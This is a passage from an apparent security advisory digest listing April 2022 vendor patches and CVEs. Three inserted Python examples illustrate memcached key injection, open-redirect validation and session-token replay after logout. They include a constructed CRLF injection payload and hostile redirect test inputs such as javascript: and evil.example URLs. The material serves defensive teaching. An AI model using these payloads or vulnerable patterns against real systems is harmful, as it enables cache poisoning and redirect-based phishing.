attacker can exploit these vulnerabilities to take control of an affected system.
HP has released security updates for Teradici PCoIP Software and Firmware that remediate
vulnerabilities discovered in libexpat prior to version 2.4.7. CVE ID: CVE-2022-22822 (Critical), CVE-2022-22823 (Critical), CVE-2022-22824
(Critical), CVE-2021-45960 (High), CVE-2022-22825 (High), CVE-2022-22826 (High),
CVE-2022-22827 (High), CVE-2021-46143 (High)
Philips has released security updates to resolve multiple vulnerabilities in several
products. CVE ID: CVE-2022-26809 (Critical), CVE-2022-26784 (Medium)
Huawei has released a security update to address a buffer overflow vulnerability in a Huawei
product. Successful exploitation of this vulnerability can lead to privilege escalation.
CVE ID: CVE-2022-29797 (Critical)
ASUS has released a security update to resolve multiple vulnerabilities in ASUS RT-AX88U
firmware. It is recommended that users update to the 3.0.0.4.386.46065 or newer version.
CVE ID: CVE-2022-26673 (Medium), CVE-2022-26674 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Microsoft has discovered multiple vulnerabilities, collectively referred to as Nimbuspwn,
that can allow an attacker to elevate privileges to root on many Linux desktop endpoints.
These vulnerabilities can be chained together to gain root privileges on Linux systems,
allowing attackers to deploy payloads, like a root backdoor, and perform other malicious
actions via arbitrary root code execution. The updates are available. CVE ID: CVE-2022-29799 (High), CVE-2022-29800 (High)
Cisco has released security updates to resolve a Denial of Service (DoS) vulnerability in the
Modbus preprocessor of the Snort detection engine. This vulnerability affects all open
source Snort project releases earlier than Release 2.9.19 and Release 3.1.11.0. CVE ID: CVE-2022-20685 (High)
Dell has released a security update to address an authentication bypass vulnerability in
Dell SupportAssist OS Recovery, which can be exploited by malicious users to compromise the
affected system. CVE ID: CVE-2022-26865 (Medium)
NVIDIA has released security updates to resolve multiple vulnerabilities in its JetPack
Software Development Kit (SDK) which can cause Denial of Service (DoS), escalation of
privileges, and may impact data integrity and confidentiality. CVE ID: CVE-2022-28193 (High), CVE-2022-28194 (High), CVE-2022-28195 (Medium),
CVE-2022-28196 (Medium), CVE-2022-28197 (Medium)
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Wordfence has released a security update to resolve a SQL Injection vulnerability in the
RSVPMaker plugin for WordPress. The affected versions are RSVPMaker versions up to
and including 9.2.5. CVE ID: CVE-2022-1453 (Critical)
Mitsubishi Electric has released security updates to resolve a Denial-of-Service (DoS)
vulnerability for some MELSEC series and MELIPC series products. CVE ID: CVE-2021-20609 (High), CVE-2021-20610 (High), CVE-2021-20611 (High)
A Remote Code Execution (RCE) vulnerability has been discovered in Apache CouchDB prior to
3.2.2 that allows an attacker to access an improperly secured default installation without
authentication and gain admin privileges. CVE ID: CVE-2022-24706 (Critical)
An authentication bypass vulnerability has been discovered in ThinVNC version 1.0b1 that allows
an attacker to execute code on the server by sending keyboard or mouse events to it. CVE ID: CVE-2022-25226 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-24765 (High), CVE-2022-23451, CVE-2022-23452
IBM has released security updates to resolve multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in Netatalk versions prior to Netatalk 3.1.13.
These vulnerabilities affect the QNAP operating system. CVE ID: CVE-2021-31439 (High), CVE-2022-23121, CVE-2022-23122, CVE-2022-23123,
CVE-2022-23124, CVE-2022-23125, CVE-2022-0194
SUSE has released security updates to resolve multiple vulnerabilities in Linux
Kernel. CVE ID: CVE-2022-1011 (High), CVE-2022-1016, CVE-2021-39713 (Critical), CVE-2022-0886
Wordfence has released security updates to resolve an Information Disclosure vulnerability
in WordPress' Metform Elementor Contact Form Builder Plugin. The affected versions are WP
Metform Elementor Contact Form Builder Plugin versions up to and including 2.1.3. CVE ID: CVE-2022-1442 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
It has been discovered that ASUS RT-AX88U has a Format String vulnerability, which allows an
unauthenticated remote attacker to write to arbitrary memory address and perform remote
arbitrary code execution, arbitrary system operation or disrupt service. CVE ID: CVE-2022-26674 (Critical)
It has been discovered that Spring Security OAuth versions 2.5.x prior to 2.5.2 and older
unsupported versions are susceptible to a Denial-of-Service (DoS) attack via the initiation
of the Authorization Request in an OAuth 2.0 Client application. Users of affected versions
are recommended to upgrade to Spring Security OAuth 2.5.2 or later. CVE ID: CVE-2022-22969 (Critical)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Delta Electronics has released a security update to address Out-of-bounds Write and
Out-of-bounds Read vulnerabilities in Delta Electronics ASDA-Soft. Successful
exploitation of these vulnerabilities can allow arbitrary code execution. CVE ID: CVE-2022-1402 (High), CVE-2022-1403 (High)
Johnson Controls has released a security update to address a Server-side Request Forgery
vulnerability that impacts Metasys System Configuration Tool (SCT) and System Configuration
Tool Pro (SCT Pro). A remote unauthenticated attacker can identify and forge requests to
internal systems via a specially crafted request, allowing the attacker to determine whether
specific files or paths exist. CVE ID: CVE-2021-36203 (Medium)
Ubuntu has released security updates to address several vulnerabilities in Linux kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-43975 (Medium), CVE-2022-0617 (Medium), CVE-2022-24448 (Low),
CVE-2022-24959 (Medium)
Google has released updated Chrome Dev 102 (102.0.5005.9) for Android, Dev channel
102.0.5005.6 (Platform version: 14695.11.0) for most ChromeOS devices, Beta channel
101.0.4951.41 (Platform version: 14588.67.0) for most ChromeOS devices, Dev channel
102.0.5005.12 for Linux, Mac and 102.0.5005.12/13 for Windows.
A memcached poisoning via unauthenticated request vulnerability has been discovered in Zimbra
Collaboration (aka ZCS) 8.8.15 and 9.0. It allows an unauthenticated attacker to inject
arbitrary memcache commands into a targeted instance. The injected commands are not
escaped, so the attacker can overwrite arbitrary cached entries. CVE ID: CVE-2022-27924 (High)
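The injection class described above, as an added Python example that is not Zimbra's code: a cache lookup built from an attacker-controlled key with no validation, the same lookup guarded by memcached's own key rules (no whitespace or control bytes, at most 250 bytes), and a small reader that shows how many commands the server would actually execute. The route: key layout and the sample payload are constructed for this example and do not describe Zimbra's cache schema.

```python
from typing import List

MEMCACHED_MAX_KEY = 250  # key length limit in the memcached text protocol


def naive_get(user_key: str) -> bytes:
    """Vulnerable builder: interpolates the caller-supplied key unchanged."""
    return f"get route:{user_key}\r\n".encode("utf-8")


def validate_key(key: str) -> str:
    """Enforce memcached's key rules: non-empty, <= 250 bytes, and no byte that
    is whitespace or a control character.  Rejecting CR and LF is what stops
    the attacker from terminating the command early and starting another."""
    raw = key.encode("utf-8")
    if not raw:
        raise ValueError("empty key")
    if len(raw) > MEMCACHED_MAX_KEY:
        raise ValueError("key longer than 250 bytes")
    if any(b <= 0x20 or b == 0x7F for b in raw):
        raise ValueError("whitespace or control character in key")
    return key


def key_is_rejected(user_key: str) -> bool:
    """Convenience check for tests: does the hardened path refuse this key?"""
    try:
        validate_key(user_key)
    except ValueError:
        return True
    return False


def safe_get(user_key: str) -> bytes:
    """Hardened builder: same command, but only after the key passes validation."""
    return f"get route:{validate_key(user_key)}\r\n".encode("utf-8")


def commands_seen_by_server(wire: bytes) -> List[str]:
    """Split a text-protocol stream into the commands a server would execute.

    Lines end in CRLF; storage commands (set/add/replace/append/prepend) are
    followed by one data-block line that is payload rather than a command, so it
    is skipped.  Just enough of the grammar to count what the attacker managed
    to inject.
    """
    commands: List[str] = []
    expecting_data = False
    for line in wire.split(b"\r\n"):
        if expecting_data:
            expecting_data = False
            continue
        if not line:
            continue
        text = line.decode("utf-8", "replace")
        commands.append(text)
        verb = text.split(" ", 1)[0]
        expecting_data = verb in ("set", "add", "replace", "append", "prepend")
    return commands


# Constructed attacker input: a "username" that closes the get and appends a
# set, so the server overwrites another user's cached entry with attacker data.
INJECTED_KEY = "alice\r\nset route:bob 0 0 5\r\nevil!"

if __name__ == "__main__":
    print(commands_seen_by_server(naive_get(INJECTED_KEY)))
    # ['get route:alice', 'set route:bob 0 0 5']  <- two commands from one "key"
    print(key_is_rejected(INJECTED_KEY))  # True
```

Validating the key on the application side is the right fix because the memcached text protocol has no quoting mechanism: any CRLF that reaches the socket is a command boundary. Length and character checks are also what memcached itself enforces, so a key that passes here will not be rejected by the server later.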
Atlassian has released a security update to address an authentication bypass vulnerability in
Jira and Jira Service Management's web authentication framework. A remote, unauthenticated
attacker can exploit this vulnerability by sending a specially crafted HTTP request to
bypass authentication and authorization requirements in WebWork actions using an affected
configuration. CVE ID: CVE-2022-0540 (Critical)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-20732 (High), CVE-2022-20773 (High), CVE-2022-20783 (High),
CVE-2022-20778 (Medium), CVE-2022-20795 (Medium), CVE-2022-20805 (Medium), CVE-2022-20790
(Medium), CVE-2022-20804 (Medium), CVE-2022-20787 (Medium), CVE-2022-20786 (Medium),
CVE-2022-20788 (Medium), CVE-2022-20789 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Drupal has released a security update to address an access bypass vulnerability in Drupal
core. This vulnerability only affects sites using Drupal's revision system.
Google has released updated Chrome Beta 101 (101.0.4951.41) for Android, Chrome Beta 102
(102.0.5005.7) for iOS, and Beta channel 101.0.4951.41 for Windows, Mac and Linux.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in Apache HTTP Server that affect QNAP NAS.
CVE ID: CVE-2022-22721 (Critical), CVE-2022-23943 (Critical)
A data validation vulnerability has been discovered in Mitel Service Appliance component of
MiVoice Connect, which can allow a malicious actor to perform Remote Code Execution (RCE)
within the context of the Service Appliance. The remediation is available. CVE ID: CVE-2022-29499 (Critical)
Lenovo has released security updates to address multiple BIOS vulnerabilities in Lenovo
notebooks that can lead to privilege escalation. CVE ID: CVE-2021-3970, CVE-2021-3971, CVE-2021-3972
Interlogix has released a security update to address Improper Restriction of Excessive
Authentication Attempts and Inadequate Encryption Strength vulnerabilities in Interlogix
Hills ComNav. Successful exploitation of these vulnerabilities can allow an
attacker to log in to modify the system. CVE ID: CVE-2022-26519 (Medium), CVE-2022-1318 (Medium)
Automated Logic has released a security update to address an Open Redirect vulnerability in
Automated Logic WebCtrl Server. Successful exploitation of this vulnerability
can allow an attacker to redirect the user to a malicious webpage or to download a malicious
file. CVE ID: CVE-2022-1019 (Medium)
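The redirect check a practitioner would want for this class of bug, as an added Python example that is not WebCtrl's code: a naive handler that forwards to whatever the next parameter says, beside a validator that only accepts same-origin absolute paths and rejects the usual bypasses (absolute URLs, scheme-relative //host, backslashes, javascript:, percent-encoded control characters). The parameter name and hostnames are assumptions; the advisory does not describe WebCtrl's actual parameter.

```python
from urllib.parse import unquote, urlsplit


def naive_redirect_target(next_param: str) -> str:
    """Vulnerable: the handler sends the browser wherever ?next= points."""
    return next_param


def is_safe_local_path(target: str) -> bool:
    """Accept only an absolute path on this origin, e.g. '/account?tab=2'.

    Rejects: empty values; anything with a scheme (https:, javascript:);
    scheme-relative '//host'; backslashes (some browsers normalise '/\\host'
    to '//host'); leading or trailing whitespace; and C0/DEL control
    characters, which would allow CRLF injection into the Location header.
    """
    if not target or target != target.strip():
        return False
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return False
    if "\\" in target:
        return False
    try:
        parts = urlsplit(target)
    except ValueError:          # e.g. malformed IPv6 brackets
        return False
    if parts.scheme or parts.netloc:
        return False
    return target.startswith("/") and not target.startswith("//")


def safe_redirect_target(next_param: str, default: str = "/") -> str:
    """Hardened: validate both the raw parameter and its percent-decoded form,
    because the browser will decode what we echo back; otherwise fall back
    to a fixed, known-good location."""
    if is_safe_local_path(next_param) and is_safe_local_path(unquote(next_param)):
        return next_param
    return default


if __name__ == "__main__":
    for candidate in (
        "/account/settings?tab=2",                    # legitimate
        "https://evil.example/",                      # absolute URL
        "//evil.example/",                            # scheme-relative
        "/\\evil.example",                            # backslash trick
        "javascript:alert(1)",                        # script scheme
        "/%0d%0aLocation:%20https://evil.example",    # encoded CRLF
    ):
        print(f"{candidate!r:48} -> {safe_redirect_target(candidate)!r}")
```

Where the application genuinely needs to send users to other hosts, replace the path-only rule with an explicit allow-list of full origins compared after parsing; never test with startswith() on the raw string, since "https://good.example.evil.example" passes that check.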
Cisco has released a security update to address a vulnerability in the implementation of the
Border Gateway Protocol (BGP) Ethernet VPN (EVPN) functionality in Cisco IOS XR Software.
This vulnerability can allow an unauthenticated, remote attacker to cause a denial of
service (DoS) condition. CVE ID: CVE-2022-20758 (Medium)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Dell has released a security update to resolve a covert timing channel vulnerability in Dell
BSAFE SSL-J that can be exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-24409 (Medium)
Oracle has released its critical patch update for April 2022 to address 520 vulnerabilities
across multiple products. A remote attacker can exploit these vulnerabilities to take
control of an affected system. CVE ID: CVE-2022-21445 (Critical), CVE-2022-21431 (Critical), CVE-2022-21420
(Critical), CVE-2022-23305 (Critical), CVE-2018-1285 (Critical), CVE-2021-40438 (Critical),
CVE-2022-22965 (Critical), CVE-2021-39275 (Critical), CVE-2021-3711 (Critical)
Elcomplus has released a security update to address Path Traversal, Unrestricted Upload of
File with Dangerous Type, Improper Authorization, and Cross-site Scripting vulnerabilities
in Elcomplus SmartPPT. An attacker can exploit these vulnerabilities to take
control of an affected device. CVE ID: CVE-2021-43932 (Critical), CVE-2021-43939 (High), CVE-2021-43934 (Critical),
CVE-2021-43930 (Medium)
Elcomplus has released a security update to address Cross-site Scripting, Unauthorized
Exposure to Sensitive Information, Unrestricted Upload of File with Dangerous Type, Path
Traversal, and Cross-site Request Forgery vulnerabilities in Elcomplus SmartPPT
SCADA Server. An attacker can exploit these vulnerabilities to take control of an affected
device. CVE ID: CVE-2021-43932 (Critical), CVE-2021-43938 (High), CVE-2021-43934 (Critical),
CVE-2021-43930 (Critical), CVE-2021-43937 (High)
An integer overflow or wraparound vulnerability has been discovered in multiple Real-Time
Operating Systems (RTOS) and supporting libraries. Successful exploitation of these
vulnerabilities can result in unexpected behavior such as a crash or Remote Code Execution
(RCE)/injection. Security updates are available for some products. CVE ID: CVE-2021-3420 (Critical), CVE-2021-22156 (Critical)
It has been discovered that Siemens products are affected by the Spring Framework vulnerability.
Security updates are available for some products. CVE ID: CVE-2022-22965 (Critical)
Hitachi Energy has released a security update to address a vulnerability in the HCI Modbus TCP
function of the RTU500 series providing support for Modbus TCP slave functionality. An
attacker can exploit this vulnerability only on RTU500 series in which HCI Modbus TCP is
configured and enabled by project configuration. CVE ID: CVE-2022-28613 (High)
Ubuntu has released security updates to address several vulnerabilities in klibc. An
attacker can exploit these vulnerabilities to take control of an affected system. CVE ID: CVE-2021-31870 (Critical), CVE-2021-31872 (Critical), CVE-2021-31873
(Critical), CVE-2021-31871 (High)
Dell has released a security update to resolve a SharpZipLib vulnerability in Dell EMC Log
Scrubber that can be exploited by malicious users to compromise the affected system. CVE ID: CVE-2021-32840 (Critical)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
SUSE has released a security update to resolve a buffer overflow vulnerability in IPsec ESP
transformation code in Linux Kernel. CVE ID: CVE-2022-27666 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Google has released a security update for LTS channel 96.0.4664.206 (Platform Version:
14268.81.0) for most ChromeOS devices. CVE ID: CVE-2022-1131 (High), CVE-2022-1141 (Medium), CVE-2022-1142 (Medium),
CVE-2022-1145 (Medium), CVE-2022-1143 (Medium), CVE-2022-1144 (Medium)
An Incomplete Cleanup vulnerability has been discovered in Johnson Controls Metasys
ADS/ADX/OAS Servers. Successful exploitation of this vulnerability can allow a
remote attacker to use a session token that has not been cleared upon log out of an
authenticated user. The mitigations are available. CVE ID: CVE-2021-36205 (High)
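The incomplete-cleanup pattern above, as an added Python example that is not Johnson Controls' code: a session store whose logout only expires the cookie on the client, beside one that also removes the server-side record, and the replay check that tells them apart. The in-memory dictionary stands in for whatever backing store a real server uses; the user name is constructed test data.

```python
import secrets
from typing import Dict, Optional


class NaiveSessions:
    """Vulnerable pattern: logout only instructs the browser to drop the cookie.
    The server-side record is never removed, so a token captured earlier (or
    left in a proxy log) still authenticates after the user has logged out."""

    def __init__(self) -> None:
        self._live: Dict[str, str] = {}

    def login(self, username: str) -> str:
        token = secrets.token_urlsafe(32)  # 256 bits of entropy, URL-safe
        self._live[token] = username
        return token

    def logout(self, token: str) -> Dict[str, str]:
        # Only a client-side hint; nothing changes on the server.
        return {"Set-Cookie": "session=; Max-Age=0; Path=/; HttpOnly; Secure"}

    def user_for(self, token: str) -> Optional[str]:
        """Resolve a presented token to a user, or None for an anonymous request."""
        return self._live.get(token)


class HardenedSessions(NaiveSessions):
    """Fixed pattern: logout invalidates the server-side entry, so replaying the
    old token yields an anonymous request.  pop(..., None) keeps logout
    idempotent when the same token is cleared twice."""

    def logout(self, token: str) -> Dict[str, str]:
        self._live.pop(token, None)
        return super().logout(token)


def token_replays_after_logout(store: NaiveSessions) -> bool:
    """The regression test a reviewer would run against the real server: log in,
    log out, then present the old token again.  True means the token still
    works, i.e. the incomplete-cleanup bug is present."""
    token = store.login("alice")
    store.logout(token)
    return store.user_for(token) is not None


if __name__ == "__main__":
    print("naive replays:   ", token_replays_after_logout(NaiveSessions()))     # True
    print("hardened replays:", token_replays_after_logout(HardenedSessions()))  # False
```

Against a live system the same check is an HTTP exchange: authenticate, call the logout endpoint, then re-send an authenticated request with the original token or cookie and confirm it is answered with a 401/redirect rather than user data.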
Delta Electronics has released a security update to address an Improper Restriction of XML
External Entity Reference vulnerability discovered in Delta Electronics DMARS, a
Motion Controller program development tool. Successful exploitation of this vulnerability
can allow an attacker to gain sensitive information. CVE ID: CVE-2022-1331 (Medium)
An information exposure vulnerability has been discovered in the Palo Alto Networks Cortex
XDR agent that enables a local user to learn the cryptographic hash of the supervisor
password when generating support files on a deployed agent. Palo Alto Networks has also
identified a technique that enables a local administrator to tamper with the Windows
registry to disable the Cortex XDR agent on devices running a Windows operating system.
Wordfence has released security updates to resolve a Cross-Site Request Forgery
vulnerability in WordPress' Fancy Product Designer Plugin. The affected versions are WP
Fancy Product Designer Plugin versions up to and including 4.7.5. CVE ID: CVE-2021-4096 (High)
Schneider Electric has released a security bulletin that includes a range of technical
analytics, hunting tools, and specific mitigations to help asset owners find and defend
against the framework. The mitigations are available.
CODESYS has released an advisory for all CODESYS V3 products that can be targeted and have a
communication server for the CODESYS protocol or for OPC UA. The mitigations are available.
VMware has released security updates and workarounds to resolve a remote code execution
vulnerability in VMware Cloud Director. CVE ID: CVE-2022-22966 (Critical)
Multiple vulnerabilities have been discovered in the Red Lion DA50N. Successful
exploitation of these vulnerabilities can result in data compromise, data modification, and
a denial-of-service condition. Red Lion notes the DA50N series product is at end-of-life and
does not intend to release a software update to address these vulnerabilities. Users are
encouraged to apply workarounds and mitigations or upgrade their device to DA50A and DA70A.
CVE ID: CVE-2022-26516 (High), CVE-2022-1039 (Critical), CVE-2022-27179 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Juniper Networks has released a security update to address multiple vulnerabilities in Junos
OS Evolved. These vulnerabilities affect all versions of Junos OS Evolved. CVE ID: CVE-2022-22195 (High)
Microsoft has released updates to address multiple vulnerabilities in its software. An
attacker can exploit some of these vulnerabilities to take control of an affected system.
Valmet has released a security update to address an Inadequate Encryption Strength
vulnerability in Valmet DNA, a distributed control system. Successful
exploitation of this vulnerability can allow an attacker to execute commands remotely with
system privileges. CVE ID: CVE-2021-26726 (High)
Inductive Automation has released a security update to address a Path Traversal vulnerability in
Inductive Automation Ignition. Successful exploitation of this vulnerability
can allow an authenticated attacker with network access to execute code by uploading a
malicious zip file. CVE ID: CVE-2022-1264 (Medium)
Citrix has released security updates to address vulnerabilities in multiple products. An
attacker can exploit some of these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-27505, CVE-2022-27506, CVE-2022-27503, CVE-2021-44519,
CVE-2021-44520, CVE-2022-26151, CVE-2022-21827
Microsoft has released security updates to address a critical remote code execution
vulnerability in Remote Procedure Call Runtime Library. A remote, unauthenticated attacker
can exploit this vulnerability to take control of an affected system. CVE ID: CVE-2022-26809 (Critical)
Microsoft has released security updates to address a Remote Code Execution vulnerability in
Windows Network File System. An attacker can send a specially crafted NFS protocol network
message to a vulnerable Windows machine, which can enable remote code execution. This CVE ID
is unique from CVE-2022-24497. CVE ID: CVE-2022-24491 (Critical)
Aethon has released a security update to address Missing Authorization, Channel Accessible by
Non-endpoint, and Cross-site Scripting vulnerabilities in the Aethon TUG Home Base
Server. Successful exploitation of these vulnerabilities can cause a denial-of-service
condition, allow full control of robot functions, or expose sensitive information. CVE ID: CVE-2022-1066 (High), CVE-2022-26423 (High), CVE-2022-1070 (Critical),
CVE-2022-27494 (High), CVE-2022-1059 (High)
Schneider Electric has released security updates and mitigations to resolve multiple
vulnerabilities in its products. CVE ID: CVE-2022-24324 (Critical)
Apache has released security updates to resolve a Remote Code Execution (RCE) vulnerability in
Struts versions 2.0.0 - 2.5.29. An attacker can exploit this vulnerability to take control
of an affected system. CVE ID: CVE-2021-31805
Adobe has released security updates to address several vulnerabilities in multiple
products. Successful exploitation of these vulnerabilities can lead to arbitrary code execution,
memory leaks, security feature bypass and privilege escalation.
Multiple vulnerabilities have been discovered in several Jenkins plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Zyxel has released a security update to address a local privilege escalation vulnerability
in its AP Configurator. CVE ID: CVE-2022-26413 (High), CVE-2022-26414 (Medium), CVE-2022-0556 (High)
HP has released security updates to resolve multiple vulnerabilities in several products.
The affected products are PCoIP Client, PCoIP Client SDK & PCoIP Graphics Agent of
Windows, Linux & macOS.
Google has released updated Chrome 100 (100.0.4896.85) for iOS, Stable channel 100.0.4896.88
for Windows, Mac and Linux and Chrome 100 (100.0.4896.88) for Android.
CISA has added 8 known actively exploited vulnerabilities in Firebox & XTM, Microsoft
Active Directory, Google Pixel, Checkbox Survey, Linux Kernel, QNAP Network-Attached Storage
and User Interface (UI) for ASP.NET AJAX into its Catalog. CVE ID: CVE-2022-23176 (High), CVE-2021-42287 (High), CVE-2021-42278 (High),
CVE-2021-39793 (High), CVE-2021-27852 (Critical), CVE-2021-22600 (High), CVE-2020-2509
(Critical), CVE-2017-11317 (Critical)
Debian has released a security update to resolve multiple vulnerabilities in Thunderbird which
can cause Denial of Service (DoS) or the execution of arbitrary code. CVE ID: CVE-2022-1097, CVE-2022-1196, CVE-2022-1197, CVE-2022-24713, CVE-2022-28281,
CVE-2022-28282, CVE-2022-28285, CVE-2022-28286, CVE-2022-28289
Dell has released security updates to address multiple vulnerabilities in several products.
An attacker can exploit these vulnerabilities to take control of an affected system.
A vulnerability has been discovered in ABB Arctic Wireless Gateways. An attacker can exploit
the vulnerability by remotely connecting to the serial port gateway, and/or protocol
converter, depending on the configuration. Mitigation is available. CVE ID: CVE-2022-0947
Zyxel has released security updates to resolve OS command injection and buffer overflow
vulnerabilities in several models of DSL/Ethernet CPE & Fiber ONT. CVE ID: CVE-2022-26413, CVE-2022-26414
Multiple vulnerabilities have been discovered in FANUC Corporation's equipment, ROBOGUIDE.
Successful exploitation of these vulnerabilities can lead to data corruption on users' PCs.
CVE ID: CVE-2021-38483, CVE-2021-43986, CVE-2019-43988, CVE-2019-43990, CVE-2019-43933
ASEA Brown Boveri (ABB) has released a security update to address Incomplete Internal State
Distinction, Improper Handling of Unexpected Data Type, and Uncontrolled Resource
Consumption vulnerabilities in ABB's equipment, Symphony Plus SPIET800 and PNI800. Successful
exploitation of these vulnerabilities can cause the affected device to become unresponsive,
resulting in a denial-of-service condition and requiring a manual reboot. CVE ID: CVE-2021-22285 (High), CVE-2021-22286 (High), CVE-2021-22288 (High)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Palo Alto Networks has released a security update to address an OpenSSL infinite loop
vulnerability in multiple of its products that can result in a Denial-of-Service (DoS) to the
application.
Google has released updated Beta channel 101.0.4951.26 (Platform version: 14588.41.0) for
most Chrome OS devices, Dev channel 102.0.4987.0 for Windows, Linux and Mac, Chrome Beta 101
(101.0.4951.26) for iOS, and Chrome Dev 102 (102.0.4989.0) for Android.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Mitsubishi Electric has released a security update to address a Denial of Service (DoS) and
malicious code execution vulnerability due to a heap-based buffer overflow in the DHCP client
function of VxWorks on the MELSEC-Q Series C Controller Module. The affected product is
VxWorks version 6.4. CVE ID: CVE-2021-29998 (Critical)
Red Hat has released a product enhancement advisory for Red Hat Advanced Cluster Security
for Kubernetes (RHACS) which includes bug fixes and feature improvements.
Huawei has released a security update to address an improper authentication vulnerability in
some Huawei products. Successful exploitation of this vulnerability can lead to control of
the victim device. CVE ID: CVE-2022-22259 (High)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-20781 (Medium), CVE-2022-20763 (Medium), CVE-2022-20774 (Medium),
CVE-2022-20784 (Medium), CVE-2022-20741 (Medium), CVE-2022-20782 (Medium), CVE-2022-20675
(Medium)
Ubuntu has released security updates to address several vulnerabilities in Linux Kernel. An
attacker can exploit these vulnerabilities to take control of an affected system.
Google has released updated Chrome Beta 101 (101.0.4951.26) for Android, LTS-96
96.0.4664.204 (Platform Version: 14268.79.0) for most ChromeOS devices and Beta channel
101.0.4951.26 for Windows, Mac and Linux. CVE ID: CVE-2022-0977 (High), CVE-2022-0974 (High), CVE-2022-0972 (High)
CODESYS has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2022-22519 (High), CVE-2022-22513 (High), CVE-2022-22514 (High),
CVE-2022-22518 (Medium), CVE-2022-22517 (High), CVE-2022-22516 (High), CVE-2022-22515 (High)
It has been discovered that Apache Lucene, as used in IBM products, is vulnerable to a Denial of
Service (DoS) attack triggered by sending a specific regular expression query. The affected products
are IBM Business Automation Workflow V21.0, V20.0, V19.0 & V18.0 and IBM Business
Process Manager V8.6 & V8.5. Remediation/fixes are available.
Cisco has released security updates to address Remote Code Execution (RCE) vulnerabilities
in Spring Framework affecting Spring MVC and Spring WebFlux applications running on JDK 9+
and Spring Cloud Function Framework. These RCE vulnerabilities affect several Cisco
products. CVE ID: CVE-2022-22965 (Critical), CVE-2022-22963 (Critical)
Microsoft has released security updates to address a Remote Code Execution vulnerability in
Windows Network File System. An attacker can send a specially crafted NFS protocol network
message to a vulnerable Windows machine, which can enable remote code execution. CVE ID: CVE-2022-24497 (Critical)
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
91.8. An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-1097 (High), CVE-2022-28281 (High), CVE-2022-1197 (Medium),
CVE-2022-1196 (Medium), CVE-2022-28282 (Medium), CVE-2022-28285 (Medium), CVE-2022-28286
(Medium), CVE-2022-28289 (High), CVE-2022-24713 (Low)
Patient Portal has released a security update to address an authentication bypass using alternate
path or channel vulnerability in Patient Portal's LifePoint Informatics equipment.
Successful exploitation of this vulnerability can disclose sensitive information, including
HIPAA-protected PII. CVE ID: CVE-2022-1067 (Medium)
Rockwell Automation has released a security update to address a deserialization of untrusted
data vulnerability in Rockwell Automation's ISaGRAF equipment. Successful exploitation of
this vulnerability can allow arbitrary code execution. CVE ID: CVE-2022-1118 (High)
Citrix has released security updates to address a vulnerability in Citrix
Hypervisor and Citrix XenServer that allows privileged code in a guest VM to cause the host
to crash or become unresponsive. CVE ID: CVE-2022-26357
Mozilla has released security updates to address multiple vulnerabilities in Firefox and
Firefox ESR. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available. CVE ID: CVE-2022-22410 (Low), CVE-2018-25031 (Medium), CVE-2021-46708 (Medium),
CVE-2021-38966 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system. CVE ID: CVE-2021-42392 (Critical), CVE-2022-23221 (Critical), CVE-2022-24761 (High)
Dell has released a security update to address a plain-text password storage vulnerability in
Dell EMC Repository Manager version 3.4.0. CVE ID: CVE-2022-26856 (High)
Google has released updated Chrome Beta channel 101.0.4951.19 (Platform version: 14588.31.0)
for most Chrome OS devices, Stable channel 100.0.4896.75 for Windows, Mac and Linux,
Extended Stable 100.0.4896.75 for Windows and Mac, and Chrome 100 (100.0.4896.77) for iOS.
Google has also released a security update to resolve a Type Confusion vulnerability in the Stable
channel. CVE ID: CVE-2022-1232 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities in Spring Framework and a Denial of Service (DoS) vulnerability in
the Linux Kernel affect several NetApp products. An attacker can exploit these
vulnerabilities to take control of an affected system. Updates are available for Linux
Kernel. CVE ID: CVE-2022-22965 (Critical), CVE-2022-22950 (Medium), CVE-2022-0516 (High)
A Remote Code Execution (RCE) vulnerability in the Spring Framework affects TP-Link's
